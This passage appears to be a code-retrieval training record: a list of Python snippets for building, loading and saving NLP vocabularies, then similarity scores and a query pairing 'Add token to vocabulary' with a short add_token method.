vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def GetVocab(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def build_vocabulary(self, tokens=None, embeddings=None):\n if tokens is not None and embeddings is not None:\n raise ValueError(\"Only accepts either `tokens` or `embeddings`.\")\n\n if tokens is not None:\n # Build from tokenized tokens\n # for sentence in tqdm(tokens):\n # for word in tokens:\n # print(type(word))\n # exit()\n self.vocab.extend(\n list(set([\n word\n for sentence in tqdm(tokens)\n for word in sentence\n ]))\n )\n elif embeddings is not None:\n # Build from pretrained embeddings\n for word in tqdm(embeddings):\n word = word.strip(\"\\n\")\n word = word.split(\" \")\n\n self.vocab.append(word[0])\n vector = word[1:]\n self.vectors.append(vector)", "def __init__(self, vocabulary, max_completions=5):\n self._vocabulary = vocabulary\n self._max_completions = max_completions", "def vocab_from_json(path: str) -> Dict:\n with open(path, encoding=VOCAB_ENCODING) as inp:\n vocab = json.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def _insert_vocab(self, json_obj, mode=InsertVocabMode.ALL):\n raise NotImplementedError", "def create_vocab():\n \n cutoff = CUTOFF\n \n lines = open(INFNAME_FORMAT.format(\"train\")).readlines() \\\n + open(INFNAME_FORMAT.format(\"test\")).readlines()\n 
raw = [process_line(l) for l in lines]\n cntx = Counter( [ w for e in raw for w in e ] )\n vocab = { x for x, y in cntx.items() if y > cutoff }\n \n return vocab", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def build_vocab(cleaned_captions):\n # QUESTION 1.1\n # Here we Build a vocabulary\n\n # create a vocab instance\n vocab = Vocabulary()\n\n words = dict()\n for caption in cleaned_captions: # iterate through all cleaned_caption\n for word in caption.split(): # iterate over all words in a caption\n # add the token words to vocabulary if and only if the count of word is more than MIN_FREQUENCY i.e. 3\n if word not in words.keys():\n words[word] = 1\n else:\n words[word] += 1\n if words[word] > MIN_FREQUENCY:\n vocab.add_word(word)\n\n vocab.add_word('<pad>')\n vocab.add_word('<start>')\n vocab.add_word('<end>')\n vocab.add_word('<unk>')\n\n print(vocab.idx)\n\n return vocab", "def create(cls, dictionary):\n return cls(**dictionary)", "def create(cls, dictionary):\n return cls(**dictionary)", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def trainingsVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.training',\n 'sort_on':'sortable_title',\n 'review_state':'confirmed'}\n trainings = ct.searchResults(**dictSearch)\n trainings = [SimpleTerm(b.UID,b.UID,b.Title) for b in trainings]\n return SimpleVocabulary(trainings)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def speakersVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.speaker','sort_on':'sortable_title'}\n speakers = ct.searchResults(**dictSearch)\n speakers = [SimpleTerm(b.UID,b.UID,b.Title) for b in speakers]\n return SimpleVocabulary(speakers)", "def build_vocab(sentences):\n # Build vocabulary\n 
word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def process_vocabulary(args, data, quiet=False):\n if not quiet:\n out(args.logfile, \"initializing vacabularies... \", end=\"\")\n seq_vocab = vocabulary.Vocabulary()\n bracket_vocab = vocabulary.Vocabulary()\n # loop_type_vocab = vocabulary.Vocabulary()\n\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n vocab.index(START)\n vocab.index(STOP)\n for x in data[:100]:\n seq = x[\"sequence\"]\n dot = x[\"structure\"]\n # loop = x[\"predicted_loop_type\"]\n for character in seq:\n seq_vocab.index(character)\n for character in dot:\n bracket_vocab.index(character)\n # for character in loop:\n # loop_type_vocab.index(character)\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n # vocab.index(UNK)\n vocab.freeze()\n if not quiet:\n out(args.logfile, \"done.\")\n\n def print_vocabulary(name, vocab):\n # special = {START, STOP, UNK}\n special = {START, STOP}\n out(args.logfile, \"{}({:,}): {}\".format(\n name, vocab.size,\n sorted(value for value in vocab.values if value in special) +\n sorted(value for value in vocab.values if value not in special)))\n\n if not quiet:\n print_vocabulary(\"Sequence\", seq_vocab)\n print_vocabulary(\"Brackets\", bracket_vocab)\n return seq_vocab, bracket_vocab", "def make_vocab(src_hparams, tgt_hparams):\n src_vocab = MonoTextData.make_vocab(src_hparams)\n\n if tgt_hparams[\"processing_share\"]:\n tgt_bos_token = src_hparams[\"bos_token\"]\n tgt_eos_token = src_hparams[\"eos_token\"]\n else:\n tgt_bos_token = tgt_hparams[\"bos_token\"]\n tgt_eos_token = tgt_hparams[\"eos_token\"]\n tgt_bos_token = utils.default_str(tgt_bos_token,\n SpecialTokens.BOS)\n tgt_eos_token = utils.default_str(tgt_eos_token,\n SpecialTokens.EOS)\n if tgt_hparams[\"vocab_share\"]:\n if tgt_bos_token == src_vocab.bos_token and \\\n tgt_eos_token == src_vocab.eos_token:\n tgt_vocab = src_vocab\n else:\n tgt_vocab = Vocab(src_hparams[\"vocab_file\"],\n bos_token=tgt_bos_token,\n eos_token=tgt_eos_token)\n else:\n tgt_vocab = Vocab(tgt_hparams[\"vocab_file\"],\n bos_token=tgt_bos_token,\n eos_token=tgt_eos_token)\n\n return src_vocab, tgt_vocab", "def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = 
pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def build_vocab(words, vocab_size, visual_fld=None):\n utils.safe_mkdir(visual_fld)\n file = open(os.path.join(visual_fld, 'vocab.tsv'), 'w',encoding='utf8')\n\n dictionary = dict()\n count = [('UNK', -1)]\n index = 0\n count.extend(Counter(words).most_common(vocab_size - 1))\n\n for word, _ in count:\n dictionary[word] = index\n index += 1\n file.write(word + '\\n')\n\n index_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n file.close()\n return dictionary, index_dictionary", "def load_vocab(vocab: Union[str, Vocab]) -> Vocab:\n if isinstance(vocab, Vocab):\n return vocab\n elif isinstance(vocab, str):\n return Vocab.load(vocab)\n else:\n raise NotImplementedError('Type of the input vocab is not supported. '\n 'We only support \"str\" or \"Vocab\". type(vocab) = \"{}\".'\n .format(type(vocab)))", "def create_bpe_vocabulary(bpe_vocab_fp, bpe_int_fp, data_path, truecaser_fp):\n bpe = BPE(glossaries=SPECIAL_TOKENS)\n bpe.load(bpcodes_fp=bpe_int_fp, merges=-1)\n\n tcaser = MosesTruecaser(load_from=truecaser_fp, is_asr=True)\n tcase_func = partial(tcaser.truecase, return_str=True, use_known=True)\n unsup_tok_func = lambda x: bpe.tokenize(tcase_func(x).split())\n\n # PIPELINES AND VOCAB #\n\n vocab_pipeline = assemble_vocab_pipeline(text_fname=InpDataF.REV_TEXT,\n lowercase=False,\n tok_func=unsup_tok_func)\n subword_vocab = Vocabulary(vocab_pipeline, name_prefix=\"word\",\n special_tokens=SPECIAL_TOKENS)\n subword_vocab.create(data_source={\"data_path\": data_path}, max_size=None,\n data_fnames=InpDataF.REV_TEXT)\n subword_vocab.write(bpe_vocab_fp, sep=' ')", "def __init__(self):\n self.sess = tf.Session()\n vocab_path = os.path.join(params.data_dir, \"vocab%d\" % params.vocab_size)\n self.vocab, self.rev_vocab = data_utils.initialize_vocabulary(vocab_path)\n self.model = model_utils.create_model(self.sess, True)\n self.model.batch_size = 1 # Respond 1 sentence at a time.", "def get_vocab(which_vocab):\n path = os.path.join(mg.WORKING_PATH, 'vocab', ''.join([which_vocab, '.json'\n ]))\n if os.path.exists(path):\n with open(path, 'r') as js:\n return(json.load(js))\n else:\n return(dict())", "def ensure_vocabulary(name):\n vocab = read_vocabulary_by_name(name)\n if vocab is None:\n return create_vocabulary(name)\n return vocab['id']", "def make_corpus(self, t, v=None):\n v = self.vectorizer\n\n try:\n corpus = v.transform(t)\n except ValueError, e:\n return None, None\n \n vocab = {y:x for x,y in v.vocabulary_.iteritems()}\n corpus = gensim.matutils.Sparse2Corpus(corpus, documents_columns=False)\n return corpus, vocab", "def load_vocabulary(self):\n vocab_file = open(vocabulary_path, \"r\")\n self.vocab_list = vocab_file.read().split(\"\\n\")\n vocab_file.close()\n print(\"[INFO] Reading vocabulary...\")\n print(self.vocab_list[0:15])", "def build_vocab(data):\n # data = _read_words(filename)\n counter = collections.Counter(data)\n # print('counter', counter) # dictionary for the occurrence number of each word, e.g. 'banknote': 1, 'photography': 1, 'kia': 1\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n # print('count_pairs',count_pairs) # convert dictionary to list of tuple, e.g. ('ssangyong', 1), ('swapo', 1), ('wachter', 1)\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n # print(words) # list of words\n # print(word_to_id) # dictionary for word to id, e.g. 
'campbell': 2587, 'atlantic': 2247, 'aoun': 6746\n return word_to_id", "def create_vocabs(self):\r\n print('Creating vocabs...')\r\n\r\n # Update surface_char2id\r\n unique_surfaces = set(chain(*[sentence.surface_words for sentence in self.sentences]))\r\n unique_chars = set(chain(*[surface for surface in unique_surfaces]))\r\n for ch in unique_chars:\r\n self.surface_char2id[ch] = len(self.surface_char2id)\r\n\r\n # Update lemma_char2id\r\n unique_lemmas = set(chain(*[sentence.lemmas for sentence in self.sentences]))\r\n unique_chars = set(chain(*[lemma for lemma in unique_lemmas]))\r\n for ch in unique_chars:\r\n self.lemma_char2id[ch] = len(self.lemma_char2id)\r\n\r\n # Update transformation2id\r\n for sentence in self.sentences:\r\n for transformation in sentence.transformations:\r\n for _t in transformation:\r\n if _t not in self.transformation2id:\r\n self.transformation2id[_t] = len(self.transformation2id)\r\n\r\n # Update morph_tag2id\r\n unique_morph_tags = list(chain(*[sentence.morph_tags for sentence in self.sentences]))\r\n unique_tags = set(chain(*[morph_tag for morph_tag in unique_morph_tags]))\r\n for tag in unique_tags:\r\n self.morph_tag2id[tag] = len(self.morph_tag2id)\r\n print('Surface Chars={}, Lemma Chars={}, Transformations={}, tags={}'.format(\r\n len(self.surface_char2id), len(self.lemma_char2id), len(self.transformation2id), len(self.morph_tag2id)\r\n ))", "def create_choice(question, choice_text, votes=0):\n return question.choice_set.create(choice_text=choice_text, votes=votes)", "def _init_vocab(self):\n self._word2idx = {}\n self._idx2word = {}\n self.freqs = {}\n self.vocab_size = 0\n\n self._add_word(self.pad_word)\n self._add_word(self.start_word)\n self._add_word(self.end_word)\n self._add_word(self.unk_word)\n\n self.start_word_idx = self.stoi(self.start_word)\n self.end_word_idx = self.stoi(self.end_word)\n self.unk_word_idx = self.stoi(self.unk_word)\n self.pad_word_idx = self.stoi(self.pad_word)\n\n self._special_tokens = {\n 'bos_token': self.start_word,\n 'cls_token': self.start_word,\n 'eos_token': self.end_word,\n 'sep_token': self.end_word,\n 'pad_token': self.pad_word,\n 'unk_token': self.unk_word,\n }\n\n self._special_ids = {\n 'bos_token_id': self.start_word_idx,\n 'cls_token_id': self.start_word_idx,\n 'eos_token_id': self.end_word_idx,\n 'sep_token_id': self.end_word_idx,\n 'pad_token_id': self.pad_word_idx,\n 'unk_token_id': self.unk_word_idx,\n }\n\n self.cls_token_id = self.bos_token_id = self.start_word_idx\n self.eos_token_id = self.sep_token_id = self.end_word_idx\n self.pad_token_id = self.pad_word_idx\n self.unk_token_id = self.unk_word_idx\n\n self.cls_token = self.bos_token = self.start_word\n self.eos_token = self.sep_token = self.end_word\n self.pad_token = self.pad_word\n self.unk_token = self.unk_word", "def __repr__(self):\n l1 = \", \".join(\"{}={}\".format(x,y) for x,y in self._loading_params.items())\n l2 = \"max_vocab_size={}, min_token_freq={}, max_token_freq={}, ngrams={}\".format(\n self._max_vocab_size if hasattr(self, \"_max_vocab_size\") else None,\n self._min_token_freq if hasattr(self, \"_min_token_freq\") else 0,\n self._max_token_freq if hasattr(self, \"_max_token_freq\") else None,\n self._ngrams if hasattr(self, \"_ngrams\") else [1,1]\n )\n desc = \"Vocabulary({}, {})\".format(l1, l2)\n return desc", "def __init__(\n self, values: Set, name: str, namespace: Optional[str] = None,\n label: Optional[str] = None, description: Optional[str] = None\n ):\n super(VocabularyHandle, self).__init__(\n name=name,\n 
namespace=namespace,\n label=label,\n description=description\n )\n self.values = values", "def save_vocabulary(path, vocab):\n print('saving vocabulary..')\n with open(path, 'wb') as handle:\n pickle.dump(vocab, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('vocabulary was saved successfully!')", "def create_vocab(vocab_size):\n vocab_dict = tff.simulation.datasets.stackoverflow.load_word_counts(\n cache_dir='/tmp')\n return list(vocab_dict.keys())[:vocab_size]", "def build_vocab(path, fname):\r\n\twords = open(path, 'r', encoding='utf-8').read().split()\r\n\twordCount = Counter(words)\r\n\tif not os.path.exists(pm.vocab_path):\r\n\t\tos.makedirs(pm.vocab_path)\r\n\twith open(pm.vocab_path + fname, 'w', encoding='utf-8') as f:\r\n\t\tf.write(\"{}\\t1000000000\\n{}\\t1000000000\\n{}\\t1000000000\\n{}\\t1000000000\\n\".format(\"<PAD>\", \"<UNK>\", \"<SOS>\", \"<EOS>\"))\r\n\t\tfor word, count in wordCount.most_common(len(wordCount)):\r\n\t\t\tf.write(u\"{}\\t{}\\n\".format(word, count))", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def load_vocab(path, encoding=\"UTF-9\"):\n vocab = []\n\n if not os.path.exists(path):\n return vocab\n\n with open(path, encoding=encoding) as fin:\n for line in fin.readlines():\n line = line.strip()\n word, freq = line.split(\"\\t\")\n vocab.append((word,int(freq)))\n\n return vocab", "def build_vocab(self, sentences, keep_raw_vocab=False, trim_rule=None, progress_per=10000, update=False):\n print(\"build------------------\")\n self.scan_vocab(sentences, progress_per=progress_per, trim_rule=trim_rule) # initial survey\n # trim by min_count & precalculate downsampling\n self.scale_vocab(trim_rule=trim_rule, update=update)\n self.finalize_vocab(update=update)", "def from_dataset(cls, dataset, col_names, vocab_size, character_coverage, model_type, params):\n\n vocab = SentencePieceVocab()\n root = copy.deepcopy(dataset).build_sentencepiece_vocab(vocab, col_names, vocab_size, character_coverage,\n model_type, params)\n for d in root.create_dict_iterator(num_epochs=1):\n if d is None:\n raise ValueError(\"from_dataset should receive data other than None.\")\n return vocab", "def get_vocabulary(self, vocid, lang=None):\n\n payload = {}\n if lang is not None:\n payload['lang'] = lang\n req = requests.get(self.api_base + vocid + '/', params=payload)\n if req.status_code == 404:\n raise ValueError(req.text)\n req.raise_for_status()\n return req.json()", "def list(self, request, format=None):\n queryset = Vocab.objects.all()\n serializer = VocabSerializer(queryset, context={\"request\": request})\n return Response(serializer.data)", "def build_vocab(captions, threshold=0):\n\n\tcounter = Counter()\n\tfor caption in captions:\n\t\ttokens = caption.lower().split('/') \n\t\tcounter.update(tokens)\n\n\n\t# If the word frequency is less than 'threshold', then the word is discarded.\n\twords = [word for word, cnt in counter.items() if cnt >= threshold]\n\t# Creates a vocab wrapper and add some special tokens.\n\tvocab = 
Vocabulary()\n\tvocab.add_word('<pad>')\n\tvocab.add_word('<start>')\n\tvocab.add_word('<end>')\n\tvocab.add_word('<unk>')\n\n\t# Adds the words to the vocabulary.\n\tfor i, word in enumerate(words):\n\t\tvocab.add_word(word)\n\treturn vocab" ]
[ "0.67872804", "0.660514", "0.6490391", "0.6246055", "0.6192233", "0.61789507", "0.6158393", "0.613217", "0.61019224", "0.60960674", "0.606695", "0.6037764", "0.6025569", "0.59994584", "0.59994584", "0.5967367", "0.5922967", "0.59061986", "0.58743894", "0.58231103", "0.5815941", "0.5815354", "0.5810426", "0.5759699", "0.57592255", "0.57481694", "0.57349885", "0.5726076", "0.5724806", "0.57091016", "0.56836206", "0.56727535", "0.56656533", "0.5655575", "0.56373805", "0.5620854", "0.5611739", "0.55690795", "0.5556263", "0.5551625", "0.5535476", "0.54586774", "0.54565084", "0.545555", "0.5444492", "0.5444163", "0.5442156", "0.5433655", "0.5396574", "0.5395586", "0.539448", "0.53885674", "0.5363615", "0.53581876", "0.53578436", "0.5346128", "0.53391033", "0.53354496", "0.5316495", "0.5288133", "0.52873045", "0.52710426", "0.526976", "0.526976", "0.5266856", "0.5258536", "0.5245212", "0.52396846", "0.52382874", "0.5226467", "0.5209122", "0.5209122", "0.5209122", "0.5208433", "0.5208367", "0.520046", "0.5182154", "0.5168196", "0.51552653", "0.51517135", "0.51512915", "0.51256377", "0.51094", "0.51088154", "0.51039046", "0.50928116", "0.5091421", "0.50912714", "0.5081315", "0.50798154", "0.50686955", "0.50644106", "0.50572306", "0.5044631", "0.5041498", "0.50410867", "0.50322527", "0.5031752", "0.5024196", "0.5024069", "0.5002711" ]
0.0
-1
Add token to vocabulary.
def add_token(self, token): token = self.process_token(token) self._token_count.update([token])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_token(self,token):\n\t\tif not token:\n\t\t\tlogging.error(\"Token cannot be empty!\")\n\t\t\texit()\n\n\t\tself.tokens.append(token.lower())\n\t\t#self.user_defined_token = token.lower()", "def add_embedding(self, token, embedding):\n self.word2idx[token] = self.vocab_size\n self.vocab_size += 1\n\n self.embedding = np.vstack((self.embedding, embedding))", "def add_vocab_word(self, word):\n # If it's a special token, it'll be separatelly processed during saving file. Skip here.\n if word in special_tokens:\n return\n # Check each character in the word. We don't want none-character (control code) in the vocaburary.\n for char in word:\n if cu.is_none_char(char):\n return\n # If it's a new word, store it.\n if (not word in self.words_ext) and (not word in self.words_new):\n self.words_new.append(word)", "def AddToken(self, token, merge=False):\n token.SetLangId(self.id_)\n if not merge:\n self.tokens_.append(token)\n else:\n exists = self.MatchToken(token)\n if exists is None:\n self.tokens_.append(token)\n else:\n exists.IncrementCount(token.Count())", "def __setitem__(self, word):\n raise ValueError(\"Vocabulary is only readable, if you want to set new k-v pair, use vocab.add()\")", "def add_doc_to_vocab(filename, vocab):\n doc = load_doc(filename)\n tokens = clean_doc(doc)\n vocab.update(tokens)", "def add_doc_to_vocab(filename, vocab):\n doc = load_doc(filename)\n tokens = clean_doc(doc)\n vocab.update(tokens)", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def add_token(\r\n self,\r\n ind: int,\r\n w: str,\r\n ) -> AddToken:\r\n self.t = self.t + 1\r\n content = self._encrypt_update(self.t, Op.ADD, ind, w)\r\n return self.sigma.add_token(content, w)", "def add_word(self, word, freq=None):\n pass", "def addToken(self, token: Token, offset: int):\n self.__tokens.append(token)\n self.__tokenMap[token] = offset", "def addKeyWord(self, kWord):\n #kWord.printKeyWord()\n self.sentence.append(kWord)", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def _add_word(self, word):\n if not word in self._word2idx.keys():\n self._word2idx[word] = self.vocab_size\n self.freqs[word] = 0\n self._idx2word[self.vocab_size] = word\n self.vocab_size += 1\n self.freqs[word] += 1", "def register_vocab(self, start_concept, end_concept, alias_of, regex_str):\n self.register_vocabulary(start_concept, end_concept,\n alias_of, regex_str)", "def add_word_tag(self, token, label):\n # Add total count for label\n self.label_counts[label] += 1\n # Add count for word given label\n if token not in self.words_labels_counts[label]:\n self.words_labels_counts[label][token] = 1\n else:\n self.words_labels_counts[label][token] += 1", "def addToken(self, tokenType, value):\r\n\t\tself.tokens.append( Token(tokenType, value) )", "def add_word(self):\n word = self.word # easier to call word now\n\n wordlist_path = self.get_wordlist_path()\n with 
open(wordlist_path) as f:\n data = json.load(f)\n\n if exists_already(data,word):\n exit()\n\n next_index = int(data[\"cur_index\"]) + 1 # new index\n data[\"words\"][next_index] = word # update wordlist\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1])) # alphabetisize\n data[\"cur_index\"] = next_index # update index\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n\n print(f\"[{word}] added to [{self.pos}]. This is the [{next_index}] indexed word added.\")", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def add(self, token):\n self.rpc.call(MsfRpcMethod.AuthTokenAdd, [token])", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def add_word(self, word, vector=None, low=-2., high=2.):\n if word not in self.w2v_idx:\n self.w2v_idx[word] = len(self.w2v_idx)\n if vector is None:\n vector = np.random.uniform(low=low, high=high, size=(self.w2v_dim,))\n self.w2v_out.append(np.asarray(vector, dtype=np.float32))\n else:\n print(\"word %s already in this word2vec\" % word)", "def add_vocab_words(self, words):\n for word in words:\n word = word.strip()\n if word:\n self.add_vocab_word(word)", "def update_vocab(self, word):\n \n if (word not in self.vocab and\n word in self.model.vocab and \n word not in [x.name for x in self.field]):\n \n self.vocab[word] = Vocab(index=self.vocab_size)\n self.vocab_size += 1", "def _add_non_empty_token(self, token: str):\n if token != \"\":\n self._tokens.append(token)", "def addWord(self, word):\n if word:\n self.word_dict[len(word)].append(word)", "def _insert_vocab(self, json_obj, mode=InsertVocabMode.ALL):\n raise NotImplementedError", "def push_token(self, tok):\n self.tokens.appendleft(tok)", "def add(self, word):\r\n if not word or word.strip() == '':\r\n return\r\n self.words.append(word)", "def visit(self, token: tokenize.TokenInfo) -> None:\n self._lines[token.start[0]].append(token)", "def visit(self, token: tokenize.TokenInfo) -> None:\n self._lines[token.start[0]].append(token)", "def add_word(self, word, data=None):\n self.__word = word\n self.__data = data", "def token(self, token):\n\n self._token = token", "def token(self, token):\n\n self._token = token", "def next_word(self):\n self.append = self.add_new_word", "def add_word(self, word):\n word = word.lower()\n if word in self.word_list:\n self.word_list[word] += 1\n else:\n self.word_list[word] = 1", "def add_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1", "def add_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1", "def add_token(self, symbol): # type: (Union[BuiltinTypeSymbol, VarSymbol])-> None\n\n self._symbols[symbol.name] = symbol", "def add(self, word: str) -> None:\n self.d.add(word)", "def index_word(self, token):\n if token not in self.word_2_idx:\n idx = 
len(self.word_2_idx)\n self.word_2_idx[token] = idx\n self.idx_2_word[idx] = token", "def put_vector(self, term, vector):\n self.terms.append(term)\n self.vectors.append(vector.vector)\n self.real_vectors.append(vector)\n return self.dict.update({term: vector})", "def add_word(self, word):\r\n word = word.strip().lower()\r\n if word in self.builtin_words:\r\n return\r\n if word not in self.word_count:\r\n self.word_count[word] = 1\r\n else:\r\n self.word_count[word] += 1", "def add(self, word: str) -> None:\n self.d.add(word)\n self.d.add(word.lower())\n self.save_user_dict()", "def add_special_tokens_(model, tokenizer):\n orig_num_tokens = len(tokenizer.encoder)\n num_added_tokens = tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN) # doesn't add if they are already there\n if num_added_tokens > 0:\n model.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)", "def addWord(self, word: str) -> None:\n self.dict[len(word)].append(word)", "def setVocabulary(self, vocabulary): # real signature unknown; restored from __doc__\n pass", "def add_token(self, amount):\n self.M += amount", "def add(self, word: str) -> None:\n self.words.add(word)\n self.added_words.add(word)", "def update_from_vocabulary(self, vocab_path):\n with open(vocab_path, 'r') as vocab_file:\n for word in vocab_file:\n word = word.strip()\n self._add_new_word(word)", "def addWord(self, word):\n current_node = self\n for idx, letter in enumerate(word):\n if letter not in current_node.kids:\n current_node.kids[letter] = WordDictionary()\n current_node.kids[letter].val = letter\n current_node = current_node.kids[letter]\n if idx == len(word) - 1:\n current_node.isWord = True", "def add_word(self, word):\n\n if word in self.wordlist:\n return \"Already in word list\"\n\n file_name = self.config_folder + self.wordlist_file\n word_list = open(file_name,'a+')\n word_list.write(word + \"\\n\")\n word_list.close()\n return None", "def add_word(self, word):\n word = self.map_word(word)\n super(InvariantLanguage, self).add_word(word)", "def addWord(self, word: str) -> None:\n self.trie.insert(word)", "def _add_token(self, token_type: TokenType, literal: Any = None):\n text = self.source[self.start : self.current]\n\n self.tokens.append(\n Token(token_type=token_type, lexeme=text, literal=literal, line=self.line)\n )", "def add_unknown_token(self):\n self.load_all()\n sample_idxs = np.random.randint(0, self.embedding.shape[0],\n self.config.embedding_sample_size)\n unknown_vector = np.mean(self.embedding[sample_idxs, :], axis=0)\n\n self.add_embedding(self.config.unknown_token, unknown_vector)\n self.write_all()", "def addWord(self, word: str) -> None:\n tmp = self.root\n for i, letter in enumerate(word):\n if letter not in tmp.seq:\n tmp.seq[letter] = Node()\n \n tmp = tmp.seq[letter]\n \n tmp.value = word", "def token_vector(self, token):\n unit_id = self.svecs.vocab.unit2id(token.text)\n return self.svecs.emb[unit_id]", "def addWord(self, word):\n lenw = len(word)\n if not lenw in self.bag:\n self.bag[lenw] = []\n self.bag[lenw].append(word)", "def add_word_to_trigram(new_word):\n # Trigrams require 2 previous words\n # If we don't have those yet, then set them\n if len(prev_words) < 2:\n prev_words.append(new_word)\n return\n\n # If it exists, add the word to the list\n # If it doesn't exist, create it\n word_tuple = (prev_words[0], prev_words[1])\n if word_tuple in trigrams:\n trigrams[word_tuple].append(new_word)\n else:\n trigrams[word_tuple] = [new_word]\n\n # Increment the prev words\n prev_words.pop(0)\n 
